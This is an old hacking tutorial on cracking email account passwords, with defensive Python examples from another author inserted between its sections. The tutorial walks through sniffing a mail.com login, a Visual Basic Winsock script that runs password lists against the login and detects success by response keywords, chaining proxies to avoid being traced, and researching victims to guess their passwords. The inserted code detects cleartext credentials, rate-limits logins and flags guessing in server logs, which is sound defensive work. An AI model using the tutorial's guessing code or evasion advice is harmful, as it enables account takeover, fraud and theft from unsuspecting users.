PickPocket: The Common Password Cracker
By: Christopher da Vinci <davinci@usa.com>

Legal Mumblejumble
   Before I start ranting about the skills, tools, and knowledge it takes to be a common password cracker, it's important to remember that cracking is against every online service's TOS (Terms Of Service), and charges could be pressed against anyone involved. It's also extremely important for you to realize that I, Christopher da Vinci, am in NO way responsible for your actions. If charges are pressed you may not accuse Christopher da Vinci, family members, or anyone else who reads this tutorial. Now with all the legal "stuff" out of the way, enjoy.


Introduction
   Yes, I am a password cracker. Not the most glamorous lifestyle, but on the other hand it will "cure what ills ya". I've traveled down basically every path to hacking. Nowadays I pretty much stay close to home and code crackers for others, but from time to time I get my hands dirty. Password crackers impress me for one reason: you never know when they're coming. Everything could be fine and the next second your account won't log in and your credit card is maxed out. Not every cracker is a bad person, but a lot of them are after the high scores: system access, PIN numbers, and Social Security numbers. This tutorial isn't really for that kind of person; this is for the common password cracker, the email cracker. Cracking PIN numbers and all that is fun, but you can't expect to start at the top, can you?


Where to Start
   First, get yourself a good PACKET SNIFFER. This is an important tool to have when trying to find out how a login works. Personally I use CommView Packet Monitor v3.1 by TamoSoft Inc.; it costs around $100, but that's where software cracking comes into play. A packet sniffer lets you view everything being sent from your computer to another network, and it also shows everything being sent from that network back to your computer. Sometimes, on lonely nights, I just sit and watch the packets fly across my screen. God, I'm pathetic. Now that you've all laughed at me, let's move on...

   Secondly, learn to PROGRAM. Yes, THIS MEANS YOU! Stop crying, man, it's going to be okay. I've been programming for about ten years, give or take. Since you're probably not an advanced programmer (PUT THE HTML BOOK AWAY), I suggest starting out with something simple like Visual Basic or even Delphi. You need programming skills, just small ones, to make simple programs that will run a PASSWORD LIST (more on this later) through a login via WINSOCK (more on this later).

   Thirdly, READ EVERYTHING! Get a well-rounded understanding of how CGI, PHP, ASP, JSP, and LOGINS work. Sometimes when your cracker isn't doing its job correctly you have to make corrections that only this knowledge will let you make. It will also give you an advantage over the other crackers out there. When two crackers go after the same account, the faster, more knowledgeable one always wins.

   Fourthly, make Notepad your close and personal friend. You will be using this amazing, fantastic piece of software to write all your PASSWORD LISTS. Password lists contain, you guessed it, a list of passwords. I usually make a custom password list based on the account I'm trying to crack, but many people use the biggest list they can 'find' and just run it over and over; these people will never have the skills you will.

   Finally, get used to the dark! "I boogie, I like the night life."


Packet Sniffing 101
   First, load a webpage, e.g. www.mail.com, then minimize the browser window and open your packet sniffer.

   Secondly, start the sniffer; in CommView it's the button with the PLAY icon.

   Thirdly, go back to the browser window and log in. Once you're logged in, go back to the packet sniffer, press the stop button and look through the packets.

   Look for the packet that resembles this:
POST /scripts/common/proxy.main HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://www.mail.com/
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461;)
Host: www.mail.com
Content-Length: 98
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: loginName=username@email.com

action=login&show_frame=Enter&mail_language=us&login=username@email.com&password=letmein&x=143&y=18
   POST is the method of the form. The 'half' URL on the first line (/scripts/common/proxy.main) is what I call the suffix, the Host header is the prefix, and the longer line at the very bottom (the form body) is the sub-suffix. Placing them in order, prefix/suffix?sub-suffix, gives the full URL,
e.g. www.mail.com/scripts/common/proxy.main?action=login&show_frame=Enter&mail_language=us&login=username@email.com&password=letmein&x=143&y=18

   This may look a little strange at first, but if you load the above URL, replacing username@email.com with your email and letmein with your password, it will log you right in (it only works because this server accepts the same form fields in a GET query string as in a POST body). So now you know the full path to logging in, which is what you will crack against.
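The security point behind this section, seen from the other side of the wire: because this login goes over plain HTTP, the password is readable by anyone on the path, which is exactly what a network monitor should alert on. The following Python is an added example, not code from the tutorial; it parses a raw request the way the sniffer presents it, flags credential fields sent outside TLS, and redacts them in the alert. The field-name sets and the sample request (modelled on the capture above, with made-up values) are assumptions.

```python
# Added example (not from the tutorial): the defender's view of the capture above.
# Given raw HTTP requests as a sniffer sees them, it reports any credential field
# that travels over unencrypted HTTP, with the secret redacted so that the alert
# itself does not leak it. Field-name lists are assumptions; extend them as needed.
from urllib.parse import parse_qsl

CREDENTIAL_FIELDS = {"password", "passwd", "pwd", "pass", "pin"}      # assumed names
USERNAME_FIELDS = {"login", "username", "user", "email", "loginname"}  # assumed names


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, target, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", len(body)))
    return method, target, headers, body[:length].decode("latin-1")


def redact(value: str) -> str:
    """Keep only the length of a secret so an alert never carries the value."""
    return "*" * len(value)


def find_cleartext_credentials(raw: bytes, tls: bool = False):
    """Return one alert per credential field sent outside TLS.

    `tls` tells whether the stream the request came from was TLS-protected;
    requests inside TLS are not visible to an on-path sniffer and are skipped.
    """
    if tls:
        return []
    method, target, headers, body = parse_http_request(raw)
    fields = []
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        fields += parse_qsl(body, keep_blank_values=True)
    # A query string is just as exposed, and additionally lands in server access logs.
    if "?" in target:
        fields += parse_qsl(target.split("?", 1)[1], keep_blank_values=True)
    account = next((v for k, v in fields if k.lower() in USERNAME_FIELDS), None)
    return [
        {
            "host": headers.get("host", "?"),
            "method": method,
            "path": target.split("?", 1)[0],
            "account": account,
            "field": name,
            "value": redact(value),
        }
        for name, value in fields
        if name.lower() in CREDENTIAL_FIELDS
    ]


# Constructed sample modelled on the request shown above (values are not real).
_BODY = (b"action=login&show_frame=Enter&mail_language=us"
         b"&login=username@email.com&password=letmein&x=143&y=18")
SAMPLE_REQUEST = (
    b"POST /scripts/common/proxy.main HTTP/1.1\r\n"
    b"Host: www.mail.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Cookie: loginName=username@email.com\r\n"
    b"Content-Length: %d\r\n\r\n" % len(_BODY)
) + _BODY

if __name__ == "__main__":
    for alert in find_cleartext_credentials(SAMPLE_REQUEST):
        print(alert)
```

The same check applied to the GET form of the URL the text builds above fires just as loudly, with the added problem that a query string is written to the server's access log, so a login that accepts credentials this way leaks them to the wire and to the log at the same time.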


Programming 101
   Now, I'm not going to go into phenomenal detail; you should really read a book or online tutorial on programming. I'm just gonna give a vague overall description of programming a cracker. I mentioned WINSOCK (Windows Sockets) earlier. This is for all you Visual Basic programmers out there; the only reason I'm sticking to VB terminology is because that's the language of choice for newbies. Briefly, the bells and whistles of a cracker: a listbox for the passwords to be loaded into (more advanced programmers will just read the file without a listbox), a textbox for the account you want to crack, and maybe even a statusbar so the user knows what's going on. Okay, back to winsock: you basically set the remote host to the host (www.mail.com) and the port to 80 (the HTTP port) in the control's properties. Now go back to the form and double-click the winsock icon that you placed on the form. This opens up the winsock control's code. Inside the 'connect' event you would put something similar to this:
Dim Str As String
' Request line: the full login URL from Packet Sniffing 101, with the two textboxes filled in
Str = "GET /scripts/common/proxy.main?action=login&show_frame=Enter&mail_language=us&login=" & text1.text & _
      "&password=" & text2.text & "&x=143&y=18 HTTP/1.1" & vbCrLf
Str = Str & "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*" & vbCrLf
Str = Str & "Accept-Language: en-us" & vbCrLf
Str = Str & "Content-Type: application/x-www-form-urlencoded" & vbCrLf
Str = Str & "Accept-Encoding: gzip, deflate" & vbCrLf
Str = Str & "Host: www.mail.com" & vbCrLf
Str = Str & "Connection: Keep-Alive" & vbCrLf
Str = Str & "Cache-Control: no-cache" & vbCrLf & vbCrLf   ' blank line ends the headers
Socket.SendData Str
Where text1.text is the textbox for the username and text2.text is the textbox for the password.

Then go to the 'data arrival' function and you may code something like this:
Dim Data As String
Socket.GetData Data

If InStr(1, Data, "<title>Mail.com</title>") Then
    MsgBox "Wrong"
    Exit Sub
ElseIf InStr(1, Data, "Title: 302 Moved") Then
    MsgBox "Cracked: " & text1.text & " - " & text2.text
    Exit Sub
End If
   In each InStr call you're looking for a KEYWORD that appears only when the login is incorrect or only when it is correct; once it finds one, it tells you the result via MsgBox. To find the keywords, log in with a correct username and password while packet sniffing, then do the same with a wrong username and password, and compare the two responses.
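The cracker above works only because the server lets it guess without limit and answers differently on success and failure. The following Python is an added example, not from the tutorial, of what the login handler on the other end should do: cap failed attempts per account and per client address over a sliding window, and return the same response whether the guess was wrong, the account does not exist, or the caller is throttled. The in-memory user store, the PBKDF2 hashing, the thresholds and the injectable clock are all assumptions made so the example runs stand-alone.

```python
# Added example (not from the tutorial): what the login endpoint on the other side
# of the cracker above should do. Two controls: a sliding-window cap on failed
# attempts per account and per client address, and a response that is identical
# for "wrong password", "unknown account" and "throttled", so a script cannot tell
# whether its guess was even checked. Storage is an in-memory dict and the
# password hash is PBKDF2 so it runs stand-alone (assumption: a real service
# would use a database and a memory-hard KDF such as argon2).
import hashlib
import hmac
import os
import time
from collections import defaultdict, deque

MAX_FAILS_PER_ACCOUNT = 5    # failures tolerated per account within the window
MAX_FAILS_PER_SOURCE = 20    # failures tolerated per client address within the window
WINDOW_SECONDS = 600         # length of the sliding window
PBKDF2_ROUNDS = 100_000
FAILURE = (False, "Invalid login")   # the single answer every failure mode gets


class LoginService:
    def __init__(self, clock=time.time):
        self.clock = clock                   # injectable for tests
        self.users = {}                      # account -> (salt, derived key)
        self.fails = defaultdict(deque)      # "acct:x" / "src:x" -> failure timestamps

    @staticmethod
    def _derive(password: str, salt: bytes) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)

    def register(self, account: str, password: str) -> None:
        salt = os.urandom(16)
        self.users[account] = (salt, self._derive(password, salt))

    def _recent_failures(self, key: str) -> int:
        """Drop timestamps older than the window and return how many remain."""
        q = self.fails[key]
        cutoff = self.clock() - WINDOW_SECONDS
        while q and q[0] < cutoff:
            q.popleft()
        return len(q)

    def _record_failure(self, account: str, source_ip: str) -> None:
        now = self.clock()
        self.fails[f"acct:{account}"].append(now)
        self.fails[f"src:{source_ip}"].append(now)

    def login(self, account: str, password: str, source_ip: str):
        """Return (ok, message); the message is the same for every kind of failure."""
        if (self._recent_failures(f"acct:{account}") >= MAX_FAILS_PER_ACCOUNT
                or self._recent_failures(f"src:{source_ip}") >= MAX_FAILS_PER_SOURCE):
            self._record_failure(account, source_ip)   # throttled tries still count
            return FAILURE
        # Unknown accounts get a dummy record so the KDF runs either way (no timing tell).
        salt, expected = self.users.get(account, (b"\0" * 16, b"\0" * 32))
        derived = self._derive(password, salt)
        if account in self.users and hmac.compare_digest(derived, expected):
            self.fails.pop(f"acct:{account}", None)     # clean slate after a real login
            return True, "302 Found"
        self._record_failure(account, source_ip)
        return FAILURE


if __name__ == "__main__":
    svc = LoginService()
    svc.register("user@example.test", "correct horse")
    print(svc.login("user@example.test", "letmein", "10.0.0.1"))        # (False, 'Invalid login')
    print(svc.login("user@example.test", "correct horse", "10.0.0.1"))  # (True, '302 Found')
```

Against the InStr logic above, this means the "Wrong" keyword shows up for every guess past the fifth, including the right one, so the list runner learns nothing until the window expires. The per-account cap has its own cost: anyone can keep an account throttled by guessing at it, which is why production services usually step up to a CAPTCHA or a second factor at the threshold instead of a hard lock.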


Proxies
   A proxy is basically the authority to act for another, and that's exactly what they do. Proxies mask (hide) your IP (Internet Protocol) address. You can find thousands of websites that offer public proxies, updated every hour or day, which basically means that these proxies can be used by anyone at any time. Proxies are a cracker's best friend. They can literally save your ass when push comes to shove. I'm sure you have been wondering how crackers don't get busted? Proxies are the answer. When companies log IPs they will just be tracing a proxy, which won't lead back to you. A lot of crackers use multiple proxies, one connecting to another and so on. Depending on the bandwidth of the proxy and the connection type, your cracking speed can go up or down. I suggest you look deeper into this topic if you're serious about becoming a cracker.


Cracking Techniques
   There are only three main techniques that come to mind when I think of password crackers: manual, info, and brute. The code in Programming 101, above, was part of my source code for a Mail.com manual cracker, which means you basically 'guess' the password one password at a time. I personally refer to manual crackers as 'snipers' due to the "one shot, one kill" approach they bring to cracking. Info cracking is for those that have no life, like myself. I love, with a passion, info cracking. Info crackers take time to research their victim, get to know them personally from afar, then use that information to 'guess' their password or to use the "forgot password" service most companies provide. Brute crackers, better known as brute forcers, load the biggest, ugliest, ungodliest password list they can find, or make, and run it for days until they have successfully gained access. Now, if I'm planning on taking down a large number of accounts at any given time then I'm all for brute forcing, but otherwise it's too freaking sloppy for me, personally.
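Each of these techniques, and the proxy rotation from the Proxies section, leaves a footprint in the target's web server log. The following Python is an added example, not from the tutorial: it reads combined-format access log lines (constructed here, with made-up addresses and accounts) for the login endpoint from the capture above, treats a 200 that serves the login page again as a failed attempt and a 302 as a success, mirroring the two keywords the cracker keys on, and raises alerts for a run of failures on one account from one source, for one account hit from several sources, and for a success that follows such a run. The thresholds are assumptions.

```python
# Added example (not from the tutorial): spotting password guessing in web server logs.
# Combined-log-format lines for the login endpoint are parsed; a 200 (the login page
# served again) counts as a failure and a 302 as a success, the same two signals the
# cracker's data-arrival code keys on. Thresholds and sample data are assumptions.
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
LOGIN_PATH = "/scripts/common/proxy.main"   # login endpoint from the capture above
FAIL_THRESHOLD = 5        # failures from one source on one account before alerting
SOURCE_THRESHOLD = 3      # distinct sources failing on one account before alerting


def parse_line(line: str):
    """Return (ip, account, status) for a login request, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if url.path != LOGIN_PATH:
        return None
    account = parse_qs(url.query).get("login", ["?"])[0]
    return m["ip"], account, int(m["status"])


def detect_guessing(lines):
    """Return alerts as tuples (kind, account, source(s), count)."""
    failures = defaultdict(int)      # (ip, account) -> failed attempts
    sources = defaultdict(set)       # account -> ips that failed against it
    successes = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, account, status = rec
        if status == 302:
            successes.append((ip, account))
        elif status == 200:
            failures[(ip, account)] += 1
            sources[account].add(ip)
    alerts = []
    for (ip, account), n in failures.items():
        if n >= FAIL_THRESHOLD:
            alerts.append(("brute_force", account, ip, n))
    for account, ips in sources.items():
        if len(ips) >= SOURCE_THRESHOLD:
            alerts.append(("distributed", account, sorted(ips), len(ips)))
    # A success right after a run of failures from the same source is the one to act on first.
    for ip, account in successes:
        if failures.get((ip, account), 0) >= FAIL_THRESHOLD:
            alerts.append(("success_after_guessing", account, ip, failures[(ip, account)]))
    return alerts


def _login_line(ip, second, account, guess, status):
    """Build one constructed log line in combined format."""
    return (f'{ip} - - [01/Jan/2002:03:14:{second:02d} +0000] '
            f'"GET {LOGIN_PATH}?action=login&login={account}&password={guess} HTTP/1.1" '
            f'{status} 5120')


# Constructed sample: one source runs a list against one account and gets in on the
# seventh try; three other sources each try one guess on a second account.
SAMPLE_LOG = (
    [_login_line("10.0.0.5", i, "victim@email.com", f"guess{i:02d}", 200) for i in range(6)]
    + [_login_line("10.0.0.5", 6, "victim@email.com", "guess06", 302)]
    + [_login_line(f"10.0.0.{n}", 20, "bob@email.com", "try", 200) for n in (6, 7, 8)]
    + ['10.0.0.9 - - [01/Jan/2002:03:21:00 +0000] "GET /index.html HTTP/1.1" 200 1234']
)

if __name__ == "__main__":
    for alert in detect_guessing(SAMPLE_LOG):
        print(alert)
```

The constructed lines carry the guessed passwords in the query string because the cracker above sends them in a GET; that is a second reason a login form built this way is a liability for the site, since every guess, and eventually the real password, ends up in the access log. The "distributed" signal is the log-side view of the proxy chains the Proxies section recommends: the source addresses change, but the account under attack does not.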


Summary
   Well folks, I hope you enjoyed the text file. Check out my page at www.cracker.host.sk for other pieces of work by me. I'm out of here.